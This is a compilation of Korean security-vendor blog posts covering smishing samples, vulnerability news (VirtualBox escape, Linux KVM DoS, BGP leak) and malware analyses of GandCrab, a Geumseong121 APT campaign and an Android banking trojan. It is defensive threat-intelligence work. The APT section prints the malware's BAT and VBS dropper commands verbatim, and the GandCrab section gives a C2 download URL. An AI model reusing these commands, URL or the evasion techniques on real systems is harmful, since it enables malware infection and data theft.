[11월 둘째주] 알약 스미싱 알림

 

본 포스트는 알약M 사용자 분들이 ‘신고하기’ 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 ‘특이 문자’를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다.

특이 문자 

 No.

문자 내용 

1

 너의 성적인 사진이 있으니 클릭하게끔 유도하는 문자

 2

 [Web발신] 11월11일/오후5시/라루체호텔/헤이스룸 [Web발신] ♣an eternal promise♣ 11.11(일).PM5시{포시즌호텔3층}

 3

 [Web발신] Cj대한통운 운송장번호[3209224154]  주문하신 상품이 발송 되었습니다

 4

 [Web발신][CJ대한통운]나기은11월07일택배주소를찾을수없음주소변경

Researcher discloses VirtualBox Zero-Day without reporting it to Oracle

보안 연구원인 Sergey Zelenyuk이 오라클의 VirtualBox 가상화 소프트웨어의 제로데이 취약점에 대한 세부사항을 공개했습니다. 이 취약점은 공격자가 게스트에서 호스트로 탈출하는데 악용될 수 있습니다.

Zelenyuk은 오라클의 패치를 기다리지 않고 이 취약점을 대중에 공개했습니다. 이유는 현대 정보 보안의 상태, 특히 보안 연구 및 버그바운티 쪽의 의견에 동의하지 않기 때문이라고 밝혔습니다.

이 취약점은 VirtualBox 5.2.20 및 이전 버전에 영향을 미치며, 모든 호스트 또는 게스트 OS에서 악용될 수 있습니다.

Zelenyuk은 디폴트 설정에서 동작하는 익스플로잇 코드를 개발했습니다. 유일한 요구사항은 네트워크 카드가 Intel PRO/1000 MT Desktop (82540EM)이어야 하며, NAT 모드여야 한다는 것입니다.

그는 Ubuntu 16.04 및 18.04 x86-64 guest에서 이 익스플로잇을 성공적으로 테스트 했습니다. 하지만 그는 이 코드가 윈도우에서도 작동할 것이라 추측했습니다.

이 취약점의 근본적인 원인은 메모리 충돌 버그입니다. 이는 루트 또는 관리자 권한을 가진 공격자가 guest에서 host ring3으로 탈출하는데 악용될 수 있습니다. 그런 다음, 공격자는 기존 테크닉을 사용해 /dev/vboxdrv를 통해 ring0으로 권한을 상승시킬 수 있습니다.

“이 익스플로잇은 리눅스 커널 모듈(LKM)으로 guest OS에 로드됩니다. 윈도우의 경우 초기화 래퍼와 커널 API 호출을 통한, LKM과 다른 드라이버가 필요할 뿐입니다.

“양쪽 OS 모두에서 드라이버를 로드하기 위해서는 상승 된 권한이 필요합니다. 이는 흔한 일이며, 극복이 불가능한 장애물로 간주 되지 않습니다. Pwn2Own 콘테스트에서, 연구원들은 익스플로잇 체인을 사용합니다. Guest OS에서 악성 웹사이트를 오픈한 브라우저를 악용하고, guestOS의 하이퍼바이저에서 공격하는데 필요한 ring0에 도달하기 위해 OS 취약점도 악용 되었습니다. 가장 강력한 하이퍼바이저 취약점들은 guest ring 3에서도 악용이 가능합니다. VirtualBox 또한 guest root 권한 없이도 도달이 가능한 코드였으며, 대부분 여기에 대한 감사가 이루어지지 않았습니다.”

이 연구원은 문제를 완화 시키기 위해 사용자들에게 가상 머신의 네트워크 카드를 AMD PCnet 또는 반가상화 된 네트워크 어댑터로 변경하거나, NAT의 사용을 피하라고 조언했습니다.

출처 :

https://securityaffairs.co/wordpress/77771/hacking/virtualbox-zero-day.html

Instagram Accidentally Exposed Some Users’ Passwords In Plaintext

인스타그램이 일부 사용자의 패스워드가 일반 텍스트 형태로 노출될 수 있었던 보안 취약점을 패치했습니다.

인스타그램 측은 영향을 받은 사용자들에게 이 보안 버그에 대해 알리기 시작했습니다. 이 버그는 최근 추가 된 기능인 “사용자 데이터 다운로드”에 존재했습니다. 이는 사진, 댓글, 포스트 등 인스타그램에 공유 된 데이터의 복사본을 다운로드할 수 있도록 하는 기능입니다.

승인 되지 않은 사용자들이 사용자들의 개인 데이터를 얻는 것을 방지하기 위해, 이 기능은 데이터를 다운로드하기 전 패스워드를 한번 더 묻습니다.

하지만 “사용자 데이터 다운로드”기능을 사용한 일부 사용자들의 패스워드가 일반 텍스트 형태로 URL에 포함 되어 있으며 페이스북의 서버에도 저장 되어 있었던 것으로 나타났습니다. 이 버그는 인스타그램 내부 팀에서 발견하였습니다.

인스타그램은 모회사인 페이스북이 소유한 서버에 저장 된 데이터는 삭제 되었으며, 이 툴은 현재 문제 해결을 위해 업데이트 된 상태라고 밝혔습니다. 또한 이 문제가 “매우 적은 수의 사용자들에게만” 영향을 미쳤다고도 밝혔습니다.

인스타그램은 유럽의 데이터 보호법인 GDPR을 준수하고, 페이스북의 캠브리지 아날리티카 관련 사고로 인한 사용자들의 프라이버시 우려를 덜기 위해 지난 4월 이 “사용자 데이터 다운로드”기능을 공개했습니다.

영향을 받는 사용자들은 패스워드를 즉시 변경하고 브라우저 히스토리를 삭제할 것을 강력히 추천합니다.

아직까지 인스타그램으로부터 어떠한 안내도 받지 않았다면, 당신의 인스타그램 계정은 이 버그에 영향을 받지 않았을 가능성이 높습니다. 하지만 계정의 프라이버시 및 보안이 신경 쓰인다면, 비밀번호를 변경하는 것이 좋습니다.

또한 사용자들은 이중 인증(2FA)을 활성화 하고 강력하고 고유한 패스워드를 사용하여 계정을 보호할 것을 권장합니다.

출처 : 

Google Services down due to BGP leak, traffic hijacked through Russia, China, and Nigeria

지난 월요일 BGP 유출로 인해 구글 서비스가 이용이 불가능한 상태가 되었습니다. 해당 트래픽은 러시아, 중국 및 나이지리아를 통해 리디렉트 되었습니다.

이 사고의 원인이 단순한 오류 때문인지, 아니면 BGP 프로토콜에 대한 사이버 공격 때문인지는 아직까지 확인 되지 않았습니다.

BGP 하이재킹이라고도 알려진 경로 하이재킹은 IP 주소 그룹의 라우팅 테이블이 의도적으로, 또는 실수로 손상 된 경우 발생합니다.

최근 보안 연구원인 Chris C. Demchak와 Yuval Shavitt는 지난 몇 년 동안 차이나 텔레콤이 인터넷 트래픽이 중국을 지나도록 부적절하게 리디렉트하고 있는 것을 발견했습니다.

차이나 텔레콤은 현재 북미 네트워크에 인터넷 접속 포인트(PoPs) 10곳(미국에 8곳, 캐나다에 2곳)을 소유하고 있으며, 주요 교환 지점에 걸쳐 있는 상태입니다.

두 연구원은 이 통신사가 트래픽이 중국을 지나가도록 하이잭하는데 PoPs를 악용했으며, 이는 지난 몇 년 동안 여러 차례 일어났다고 지적했습니다.

“BGP 포워딩 테이블 내에서, 각 AS(자율 시스템)의 관리자들은 목적지로 사용 되거나, 편리한 통과 지점으로 사용할지에 관계 없이 자신의 AS가 가지고 있는 IP 주소 블록을 이웃 AS에 알립니다.”

“BGP 구성의 복잡도로 인해 에러가 발생할 수 있습니다. 이러한 에러는 공격자들에게 수 많은 하이잭 기회를 제공합니다. AS1 네트워크가 실제로는 AS2의 소유인 IP 블록을 소유한다고 실수로 BGP에 알리면, AS2가 목적지인 인터넷의 트래픽은 AS1로, 또는 AS1을 통해 라우팅 됩니다. 만약 잘못 된 알림이 악의적으로 만들어졌다면, BGP 하이잭이 발생합니다.”

가장 최근 발생한 BGP 유출은 네트워크 모니터링 회사인 ThousandEyes에서 처음으로 제보 되었으며, 검색, G Suite 및 다양한 구글 클라우드 서비스를 포함한 구글 서비스가 목적지인 트래픽이 러시아의 TransTelecom, 나이지리아의 ISP인 MainOne, 그리고 차이나 텔레콤을 지나도록 다이렉트 되었습니다.

ThousandEyes는 “2018년 11월 12일, 오후 1:00 ~2:23(PST) 사이에 우리 조직에서 사용하는 중요한 어플리케이션인 G Suite에 연결할 수 없었습니다. 통계를 검토한 결과, 이는 ThousandEyes 사무실의 모든 사용자에게 영향을 미치고 있었습니다.”

“이 서비스 연결 중단 사태는 G Suite 뿐만 아니라 구글 검색, 구글 애널리틱스(Analytics)에서도 마찬가지로 발생했습니다. 우리는 구글로의 트래픽이 차이나 텔레콤에서 끊긴다는 사실을 발견했습니다. 샌프란시스코 사무실에서 구글로 가는 트래픽이 왜 중국까지 갔을까요? 우리는 이 트래픽의 경로에서 러시아의 ISP도 발견했습니다.”

<이미지 출처 : https://securityaffairs.co/wordpress/77971/hacking/google-traffic-bgp-leak.html>

BGP 라우팅 모니터링 회사인 BGPmon에 따르면, 구글의 네트워크 prefix 212개가 이에 영향을 받았습니다.

ThousandEyes는 이 BGP 유출이 나이지리아의 MainOne과 차이나 텔레콤 사이의 BGP 피어링 관계 때문이라 추측했지만, 어쨌든 BGP 유출이 의도적인 공격으로 인한 결과인지 MainOne의 잘못 된 구성 탓인지는 불분명합니다.

“이 사건으로 인해 G Suite와 구글 검색 서비스에 대규모 서비스 거부(DoS)가 발생했습니다. 또한 이를 통해 오랫동안 인터넷을 감시해온 국가들은 귀중한 구글 트래픽을 손에 넣을 수 있었습니다.”

“우리는 분석을 통해 이 유출의 근원은 나이지리아의 MainOne과 차이나 텔레콤과의 BGP 피어링 관계라는 결론을 내렸습니다. MainOne은 라고스의 IXPN을 통해 구글과 피어링 관계를 맺고 있으며, 구글로 이어지는 직접적인 경로를 가지고 있습니다. 이 경로가 차이나 텔레콤에 유출 되었습니다.”

구글은 이 문제의 근본적인 원인이 회사 시스템 외부에 존재한다는 것을 확인하고 내부 조사를 시작했습니다.

“이 문제가 지속 되는 동안 구글의 서비스는 정상적으로 작동했으며, 구글은 이 문제의 근본 원인이 구글 외부에 존재한다고 판단했습니다. 우리는 재발 방지를 위해 내부 조사를 통해 시스템을 적절히 개선할 예정입니다.”

출처 :

https://securityaffairs.co/wordpress/77971/hacking/google-traffic-bgp-leak.html

https://scholarcommons.usf.edu/cgi/viewcontent.cgi?article=1050&context=mca

안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다.

 

갠드크랩 랜섬웨어가 또 다시 이력서로 위장하여 유포되고 있어 사용자들의 각별한 주의가 필요합니다. 

갠드크랩 랜섬웨어는 이력서 이메일로 위장하고 있으며, 악성 워드파일이 첨부되어 있습니다. 

 

[그림 1] 수신된 메일

만약 이용자가 첨부 파일 ‘양희종 지원서.doc’를 클릭할 경우 아래와 같이 매크로 실행을 유도 합니다.  

[그림 2] 매크로 실행을 유도하는 DOC 파일

이용자가 자세한 정보를 열람하기 위해 매크로를 실행할 경우, 난독화된 스크립트를 이용해C2 서버(http://185.224.133.221/222.exe)로 통신을 시도하고 갠드크랩(GandCrab) 랜섬웨어 5.0.4 변종을 다운로드 합니다.

[그림 3] 난독화된 스크립트

최종적으로 설치된 EXE가 실행되면 갠드크랩 랜섬웨어가 감염되어 바탕화면이 변경되고, 컴퓨터에 보관되어 있던 주요 데이터들이 모두 암호화 됩니다.

그리고 랜섬노트 ‘FJHUGKLUIW-DECRYPT.txt’ 파일이 다수의 경로에 생성되어 집니다.

[그림 4] 갠드크랩 랜섬웨어 5.0.4 변종에 감염된 화면

‘FJHUGKLUIW-DECRYPT.txt’ 랜섬노트 파일에는 다음과 같이 암호화된 파일들을 복호화하기 위한 설명이 포함되어 있습니다.

[그림 5] 갠드크랩 5.0.4 랜섬노트 화면

랜섬노트를 통해 토르(Tor) 사이트로 접속하면, 다음과 같이 대시(DASH)와 비트코인(Bitcoin) 요구 화면을 보게 됩니다.

[그림 6] 갠드크랩 복구 비용 안내 토르 사이트 화면

따라서 출처가 불분명한 메일에 있는 첨부파일 혹은 링크에 대해 접근을 삼가하시고, 검증되지 않은 파일을 실행하기 전에는 백신 프로그램을 이용하여 악성 여부 검사를 수행해주시기 바랍니다.

현재 알약에서는 관련 샘플을 Trojan.Ransom.GandCrab으로 진단하고 있습니다.

안녕하세요? 이스트시큐리티 사이버 위협 인텔리전스(CTI) 전문조직인 시큐리티대응센터 (이하 ESRC)입니다.

특정 정부가 배후에 있는 것으로 알려져 있는 위협그룹 중에 ‘금성121(Geumseong121)’ 조직은 글로벌 보안회사들이 다양한 이름으로 명명하고 있습니다. 그중 대표적 그룹명을 알파벳 순으로 나열하면 ‘APT37’, ‘Group123’, ‘RedEyes’, ‘ScrarCruft’ 등이 있습니다.

지난 02월 저희는 이 위협그룹이 카카오톡 메신저로 Flash Player Zero-day (CVE-2018-4878)’ 취약점 공격을 수행한 사례를 소개한 바 있으며, 그 이후에도 스피어 피싱(Spear Phishing)을 통해 한국에 집중 표적공격을 수행하고 있다는 것을 확인했습니다.

그리고 07월~08월에는 남북이산가족찾기 전수조사’ 내용으로 APT 공격을 수행한 사례와 작전명 로켓 맨(Operation Rocket Man)’ 분석자료를 공개한 바 있습니다. 물론, 아직 공개되지 않은 실제 침해사고 사례들이 다양하게 존재합니다.

금성121 APT ‘작전명 코리안 스워드(Operation Korean Sword)’

공개하지 않았던 사례 중 한국의 대북관련 단체나 활동가들을 상대로 다음과 같은 스피어 피싱 기반이 수행되었고, 이 공격 벡터는 08월부터 09월까지 문서내용이 동일하지만 코드가 달라진 변종이 연속적으로 발견됩니다.

악성 문서파일의 타이틀은 ‘7주 신뢰와 배려의 커뮤니케이션’이며 이 내용은 여러 보안 전문가들이 분석한 자료를 공개한 바 있고, ‘중국 보안업체 360이 블로그를 통해 분석자료’를 자세히 공개한 바 있습니다.

[그림 1] 스피어 피싱을 통해 유포된 악성 문서 파일 실행화면

ESRC는 ‘TTPs [Tactics(전술), Techniques(기술), Procedures(절차)]’ 분석을 통해 금성121 APT 위협그룹이 지속적으로 대남 사이버 작전을 수행하고 있는 것을 확인할 수 있었습니다.

해당 위협그룹은 한국의 대북 분야 활동가들을 주요 타깃으로 삼고 있으며, 주로 단체나 개인을 겨냥해 감염된 컴퓨터의 내부 자료를 은밀히 탈취하는 공통 특징이 존재합니다.

사이버 전술적으로 한국의 기관이나 기업에서 많이 사용하는 HWP 문서파일 취약점이 빈번히 사용되며, DOC 문서의 매크로 실행 유도나 XLS 문서에 플래시 취약점을 삽입하는 기술을 구사한 바도 있습니다.

APT 공격조직 주체를 파악하는데는 공격벡터와 페이로드 기능을 제대로 분석하는 것이 매우 중요하고, 조직에 속한 공격자 개개인 별 고유 습관 및 특성 지표를 정의하고 관리할 필요가 있습니다.

지난 08월과 09월에 각각 제작된 HWP 악성문서 파일은 최종 수정 시점만 다르고, 동일한 생성날짜와 시간을 가지고 있으며, 문서 작성자나 마지막 저장자의 데이터가 ‘gichang’, ‘User1’ 코드로 동일합니다.

ESRC는 악성문서에서 발견된 ‘gichang’ 키워드와 발음을 활용해 고려시대 호위부대가 무예로 사용한 기창(깃발달린 창)을 활용해 ‘작전명 코리안 스워드(Operation Korean Sword)’로 명명하였습니다.

[그림 2] 동일한 내용을 담고 있는 악성 문서 파일의 메타데이터 비교 화면

포스트스크립트(EPS) 취약점 코드를 분석해 보면, 공격 패턴에서 조금씩 변화되는 부분이 존재합니다. 초기에는 시작프로그램 경로에 배치파일(BAT) 명령어를 추가해 재 부팅시 자동실행되도록 만들었습니다.

copy /b “%appdata%*.oju01” “%appdata%WinUpdate148399843.pif” & “%appdata%WinUpdate148399843.pif” & del /f “%appdata%WinUpdate148399843.pif”

그 다음 변종 코드에서는 배치파일(BAT)을 시작프로그램에 바로 등록하지 않고, 비주얼베이직스크립트(VBS)를 시작프로그램 경로에 등록하고, 그 다음에 배치파일이 로딩되도록 전략을 수정했습니다.

Set WshShell = CreateObject(“WScript.shell”)

WshShell.Run chr(34) & “%appdata%UpgradeVer49.bat” & chr(34), 0

Set WsheShell = Nothing

VBS 파일의 쉘 명령에 의해 실행되는 BAT 파일은 시작프로그램에 있던 VBS 삭제코드가 추가된 점이 다릅니다.

copy /b “%appdata%*.cog01” “%appdata%WinUpdate75610890.pif” & “%appdata%WinUpdate75610890.pif” & del /f “%appdata%WinUpdate75610890.pif” & del /f “%appdata%MicrosoftWindowsStart MenuProgramsStartUp*.vbs” & del /f “%appdata%*01” & del /f “%appdata%*.bat”

[그림 3] HWP 악성문서에 포함되어 있는 포스트 스크립트 실행 과정 화면

악성코드는 보안제품의 탐지를 회피하기 위한 목적 등으로 EXE 실행파일의 MZ 헤더코드를 분리해서 설치한 후 다시 결합하는 절차를 수행합니다.

생성되는 ‘Dhh01.oju01’, ‘Dee01.cog01’ 파일에는 ‘4D’, ‘5A’ 2바이트(MZ)만 가지고 있으며 ‘Dhh02.oju01’, ‘Dee02.cog01’ 파일에 나머지 실행파일 데이터를 가지고 있습니다.

그리고 최종 페이로드는 더미다(Themida) 암호화 프로그램으로 패킹되어 있으며, 이 파일은 기존 ‘금성121’ 그룹이 사용하는 대표적인 RAT 기능을 수행하게 됩니다.

2018년 11월, 다시 돌아온 ‘작전명 코리안 스워드 (Operation Korean Sword)’

ESRC는 2018년 11월 16일 기존과 동일한 공격벡터를 가진 침해지표를 발견했고, 이 공격이 지난 8월부터 있었던  작전명 코리안 스워드의 연장선이라는 것을 확인했습니다.

이번에 발견된 것은 ‘※ 기 록 부.hwp’ 한글 파일명으로 발견되었으며, 실행되면 손상된 파일처럼 알 수 없는 내용이 보여지게 되면서, EPS 취약점 코드가 실행됩니다.

[그림 4] ‘※ 기 록 부.hwp’ 문서 파일 실행된 화면

악성 문서파일은 2018년 11월 16일 제작된 것을 확인할 수 있으며, ‘BinData’ 스트림에 ‘BIN0001.eps’ 포스트 스크립트 코드가 포함된 것을 확인할 수 있습니다.

[그림 5] 악성문서 내부에 포함된 날짜와 포스트 스크립트

 

포스트 스크립트는 시작프로그램 경로에 ‘MemCacheLog24.vbs’ 스크립트를 생성하고, 다음과 같은 내부 명령에 의해 ‘Cache51.bat’ 배치파일을 실행하게 됩니다.

Set WshShell = CreateObject(“WScript.shell”)

WshShell.Run chr(34) & “%appdata%Cache51.bat” & chr(34), 0

Set WsheShell = Nothing

‘Cache51.bat’ 배치파일 명령에는 다음과 같이 ‘*.hje01’ 파일을 ‘MemoryOrder85584031.com’ 바이너리 파일로 합치고, 실행한 후 삭제하게 됩니다.

copy /b “%appdata%*.hje01” “%appdata%MemoryOrder85584031.com” & “%appdata%MemoryOrder85584031.com” & del /f “%appdata%MemoryOrder85584031.com” 

[그림 6] 악성 포스트 스크립트 실행 코드 순서 및 화면

마지막에 생성되는 ‘MemoryOrder85584031.com’ 페이로드는 한국시간 기준으로 ‘2018-11-15 00:47:51’ 제작되었고, 내부에 포함되어 있는 최종 페이로드는 ‘2018-11-07 16:06:11’ 제작되었습니다.

감염된 페이로드는 감염된 시스템의 정보를 수집해 Yandex 토큰을 이용해 유출하게 되며, 공격자의 추가적인 명령을 받게 됩니다.

[그림 7] 정보가 유출되는 C2 Yandex 서비스 화면 코드

HWP 문서 파일에 포함된 포스트 스크립트(EPS) 취약점은 한컴 오피스 제품을 최신 버전으로 업데이트할 경우 고스트 스크립트 엔진 모듈이 제거되어 더 이상 위협에 노출되지 않습니다.

보안위협은 업데이트를 하지 않은 이용자를 노리고 있다는 점을 명심해야 합니다.

보다 추가적인 내용들은 ‘쓰렛 인사이드(Threat Inside)’를 통해 보다 체계적인 위협정보(IoC)와 전문화된 인텔리전스 리포트 서비스를 기업대상으로 제공할 예정입니다.

안녕하세요? 이스트시큐리티입니다.

스미싱과 보이스피싱 등을 결합한 형태로 악성 앱들이 유포되고 있습니다. 해당 앱들은 주로 1 금융 관련 앱을 사칭하였으나 최근에는 국가기관, 2 금융 사칭 등으로 다양한 형태로 나타나고 있습니다. 기기 및 개인정보를 탈취하고 금융 정보 탈취를 목적으로 기기의 통화 상태를 감시합니다.

특히, 해당 앱은 분석을 어렵게 하기 위해서 중국 Qihoo 360사의 패킹 기술을 적용하였습니다.

 

본 분석 보고서에서는 “Trojan.Android. KRBanker”를 상세 분석하고자 합니다.

악성코드 상세 분석

1. 패킹 특징

중국 Qihoo 360사의 패킹 된 앱은 일반 앱과는 다른 부분이 존재합니다. 앱의 권한과 컴포넌트 관련 정보를 볼 수 있는 매니페스트를 보면 일반 안드로이드 앱에서는 볼 수 없는 항목인 “android:qihoo”부분이 추가되어 있는데 이는 디컴파일을 방해합니다. “assets” 폴더에는 파일의 무결성과 동적 패킹에 관여하는 “.appkey”, “libjiagu.so” 파일이 포함되어 있습니다. 또한, 아래 [그림 2]를 보면 패키지명이 “com.android.hellod3”이지만, 패킹 된 덱스 코드에서는 해당 부분을 찾을 수 없어 정적 분석으로는 실제 악성 행위와 관련된 코드를 볼 수 없습니다.

 

[그림 1] 패킹 된 앱의 구조

  

 

[그림 2] 패킹 전 후 덱스코드 비교

2. 안티 디컴파일러

앱 디컴파일에 흔히 쓰이는 “apktool” 최신 버전을 통해서 컴파일을 시도하면 매니페스트의 “qihoo”와 관련된 요소를 찾을 수 없다고 하여 에러를 일으킨다. 앱의 동적 분석을 위해서는 매니페스트에 android:debuggable=”true” 항목이 필요한데 이를 방지한다.

 

[그림 3] 컴파일 실패

3. 안티 디버깅

패킹 앱의 초기에는 안티 디버깅이 포함되어 있지 않아서 메모리에 로드된 덱스 파일을 실시간 덤프를 함으로써 간단히 패킹앱의 분석이 가능했습니다. 그러나 최근 패킹 앱에는 다양한 안티 디버깅 기법이 추가되었기 때문에 동적 분석을 통해서 안티 디버깅을 우회한 다음에서야 메모리에 로드된 덱스 파일 덤프가 가능합니다.

3.1 dlactivity 확인

“/system/linker” 모듈 내부에 존재하는 “dl_rtld_db_dlactivity”의 값은 디버깅 되고 있는지 없는지를 나타냅니다.

[그림 4] dlactivity 활용 안티 디버깅

3.2 TracerPid 확인

“/proc/self/status” 파일을 확인해보면 앱과 관련된 정보들이 나타나있습니다. 그 중에서 “TracerPid”의 값을 통해서 디버깅 여부를 확인할 수 있습니다.

 

[그림 5] TracerPid 활용 안티 디버깅

3.3 주소 활성화 여부 확인

주소와 포트를 확인하여 디버깅 여부를 확인합니다. IDA를 통해서 안드로이드 원격 디버깅이 가능한데, IDA의 기본 디버깅 주소와 포트의 활성화 여부를 확인하여 디버깅 여부를 확인합니다.

 

[그림 6] 주소 확인을 통한 안티 디버깅

3.4 특정 문자 확인

“gdb”, “android_server” 등의 동적 디버깅에 사용되는 도구들의 명령어 및 메모리상의 관련 문자열 확인을 통해서 디버깅 여부를 확인합니다.

 

[그림 7] 명령어 및 메모리 확인을 통한 안티 디버깅

3.5 시간 확인

코드 실행 중간중간에 시간 관련 함수를 추가하여 해당 코드의 실행 시간을 계산하여 디버깅 여부를 확인합니다.

[그림 8] 시간 확인을 통한 안티 디버깅

3.6 덱스 파일 덤프

안티 디버깅을 모두 우회하면 복호화된 덱스 파일은 “libart.so” 모듈에 의해서 메모리로 로드되는데, 이때 덱스 파일이 로드된 메모리 주소와 덱스 파일 구조에 기록되어 있는 덱스 파일의 크기를 계산하여 해당 부분을 덤프합니다. 다음 실제 코드가 담긴 덱스코드를 분석합니다.

 

[그림 9] 덱스 파일 덤프

4. 덱스 파일 분석

“assets” 폴더에는 “image.zip” 파일이 있는데 내부에는 악성 행위에 사용되는 가짜 통화 관련 사진과 악성 앱을 구성하는 여러 개의 사진 등이 있습니다.

  

[그림 10] 악성 앱에 사용되는 파일

기기의 아이디와 전화번호를 탈취하여 식별 정보로 사용합니다.

 

[그림 11] 기기 정보 탈취

기기 부팅 시 서비스를 실행시켜 지속적인 악성 행위를 가능토록 합니다.

 

[그림 12] 기기 부팅 시 재실행

안드로이드 정책에서는 일정 시간 동안 와이파이를 사용하지 않으면 꺼지게 되는데 이를 방지하여 C&C와의 지속적인 통신을 가능토록 합니다.

 

[그림 13] 지속적인 와이파이 연결

메시지를 주기적으로 감시하고 탈취하여 C&C 서버로 전송합니다.

 

[그림 14] 메시지 탈취

주소록을 주기적으로 감시하고 탈취하여 C&C 서버로 전송합니다.

 

[그림 15] 주소록 탈취

통화 상태를 확인하고 특정 번호를 감시하여 해커에게 연결되도록 하고 사용자를 속이기 위해서 가짜 통화 사진을 팝업합니다.

[그림 16] 통화 탈취

C&C 서버는 “lib” 폴더의 “libmasker.so” 파일 내부의 함수 호출을 통해서 불러옵니다.

  

[그림 17] C&C 서버

결론

해당 악성 앱은 금융권 앱의 아이콘과 이름을 사칭합니다. 사용자의 기기 및 개인정보를 탈취하고 전화 상태를 확인하여 특정번호를 감시합니다. 통화를 종료하고 해커에게 전화를 자동으로 걸도록 하여 금융 정보를 탈취합니다. 특히, 앱의 분석을 어렵게 하기 위해서 중국의 Qihoo 360의 패킹을 적용했습니다.

따라서, 악성 앱으로부터 피해를 최소화하기 위해서는 백신 앱을 통한 주기적인 검사가 중요합니다. 출처가 불명확한 URL과 파일은 실행하지 않는 것이 기본이고 공식 마켓인 구글 플레이스토어를 통해서 확보한 앱이라도 백신 앱을 추가 설치하여 주기적으로 업데이트하고 검사해야 합니다.

현재 알약 M에서는 해당 앱을 ‘Trojan.Android.KRBanker’ 탐지 명으로 진단하고 있습니다.

안녕하세요? 이스트시큐리티입니다.

 

딥러닝 기반 악성코드 위협 대응 솔루션 ‘Threat Inside(쓰렛인사이드)’ 출시를 기념하여, 최신 보안 동향과 전문가 해석 정보를 담은 데일리 리포트 서비스 ‘시큐리티 브리핑’을 3개월 간 무료로 제공하는 이벤트를 진행합니다.

‘시큐리티 브리핑’이란?

Threat Inside의 유료 고객에게만 제공되는 국내 최초 데일리 리포트 서비스로, 이스트시큐리티 시큐리티대응센터(ESRC)가 매일 발생하는 중요한 보안 이슈와 동향을 선별해 브리핑한 정보를 뉴스레터 방식으로 발송하는 서비스입니다.

Threat Inside의 인텔리전스 리포트 서비스 중 하나인 ‘시큐리티 브리핑’은 기업과 기관의 보안 담당자가 매일 숙지해야 할 국내외 주요 보안 이슈와 동향을 쉽고 편리하게 제공받을 수 있기 때문에, 정보 확보를 위한 시간과 노력은 절감시키면서, 위협 대응을 위해 반드시 알아야 할 위협 인텔리전스를 놓치는 일이 사라질 것입니다.

‘시큐리티 브리핑’ 구독 이벤트 신청은 간단하지만, 받기 전과 후의 차이는 상당히 크게 느껴지실 겁니다.

11월 16일(금)까지 신청하시는 모든 분들께 혜택을 제공하고 있으니 늦지 않게 지금 바.로. 신청하세요!

Linux Kernel is affected by two DoS vulnerabilities still unpatched

리눅스 커널에서 서비스 거부 취약점(DoS) 두 개가 발견 되었습니다. 이 이슈는 리눅스 커널 4.19.2 및 이전 버전에 영향을 미칩니다.

이 두 이슈 모두 심각도 ‘보통’으로 분류 되었으며, 로컬 공격자가 서비스 거부 상태를 유발시키기 위해 악용할 수 있는 NULL 포인터 역참조(dereference) 이슈입니다.

첫 번째 취약점은 CVE-2018-19406로 등록 되었으며, arch/x86/kvm/lapic.c에 구현 된 리눅스 커널 함수인 kvm_pv_send_ipi에 존재합니다.

“리눅스 커널 4.19.2및 이하 버전의 arch/x86/kvm/lapic.c에 존재하는 kvm_pv_send_ipi가 로컬 사용자들이 apic 맵이 초기화 되지 않는 상태에 도달하기 위해 특별히 제작 된 시스템 호출을 통해 서비스 거부 상태(NULL 포인터 역참조 및 버그)를 유발시키도록 허용합니다.”

“apic 맵이 초기화 되지 않는 원인은 테스트 케이스가 vmcall을 통해 pv_send_ipi 인터페이스를 트리거링해 kvm->arch.apic_map이 역참조 되기 때문입니다. 이 패치는 apic 맵이 NULL인지 아닌지 확인하고 해당 케이스일 경우 즉시 해결하는 방식으로 이 문제를 수정했습니다.”

두 번째 결점인 CVE-2018-19407은 arch/x86/kvm/x86.c에 정의 된 리눅스 커널 함수인 vcpu_scan_ioapic에 존재합니다.

이 결점은 I/O APIC(Advanced Programmable Interrupt Controller)가 적절히 초기화 되지 않았을 때 촉발 됩니다.

이 취약점은 로컬 공격자가 Ioapic이 초기화 되지 않은 상태에 도달하기 위해 특별히 제작한 시스템 호출을 사용하여 악용할 수 있습니다. 

“리눅스 커널 4.19.2 및 이전 버전의 arch/x86/kvm/x86.c 내 vcpu_scan_ioapic 함수가 로컬 사용자가 ioapic 맵이 초기화 되지 않는 상태에 도달하기 위해 특별히 제작 된 시스템 호출을 통해 서비스 거부 상태(NULL 포인터 역참조 및 버그)를 유발시키도록 허용합니다.”

“원인은 테스트케이스가 hyperv synic HV_X64_MSR_SINT6 msr를 쓰고 scan ioapic 로직을 트리거 하여 synic 벡터를 EOI exit bitmap으로 로드하기 때문입니다. 그러나 irqchip은 이 간단한 테스트케이스에서 초기화 되지 않으며 ioapic/apic 오브젝트에는 접근해서는 안됩니다.”

이 두 취약점의 비공식 패치는 비공식 LKML(리눅스 커널 메일링 리스트) 아카이브에 공개 되었으나, 아직까지 업스트림으로 푸시되지는 않았습니다.

출처 :

https://securityaffairs.co/wordpress/78434/breaking-news/linux-kernel-dos-flaws-2.html

https://lkml.org/lkml/2018/11/20/580

안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다.



최근 상품 배송 관련으로 위장한 악성 피싱 메일이 발견되어 주의를 당부드립니다.

 

본 메일은 “Shipment B/L” 제목으로 전파되고 있으며, 특히 첨부파일에 송장과 물건 리스트가 있는 것처럼 사용자들을 속여 사용자들의 클릭을 유도 하고 있습니다.

[그림 1] 피싱 사이트가 포한 된 메일 본문

 

사용자가 첨부파일을 확인하기 위해 클릭 하는 순간 피싱 사이트로 연결됩니다

[그림 2] 다음 메일 피싱 사이트

 

 

사용자가 송장 리스트를 확인하기 위해 해당 페이지에 계정정보를 입력한다면,
입력한 개인정보는 모두 제작자에게 넘어가게 됩니다.

[그림
3]
사용자 계정정보 전송 화면

 

 

본 메일에 기재 된 사이트를 분석 중 제작자의 피싱 사이트 리스트를 확인 하였으며 다음(Daum)뿐만 아니라 네이트(Nate), 마이크로소프트 오피스(MS Office), 마이크로 소프트 아웃룩(Outlook) 등도
추가적으로 발견되었다
.

 

[그림 4] 네이트 피싱 사이트 화면

[그림 5] MS Outlook 로그인 피싱 사이트 화면

[그림 6] MS Outlook 패스워드 실패 피싱 사이트 화면

[그림 7] MS Outlook 패스워드 입력 피싱 사이트 화면

[그림 9] MS Office 계정 입력 피싱 사이트 화면

 

 

사용자 여러분들께서는 의심스러운 링크의 클릭을 지양하시고, 로그인
할 때에는 반드시 해당
URL을 확인하는 습관을 길러야 합니다

 

[그림 10] 바이러스토탈 피싱 사이트 탐지 화면

 

해당 피싱 사이트에 대한 더 자세한 정보는 Threat
Inside
에서 확인하실 수 있습니다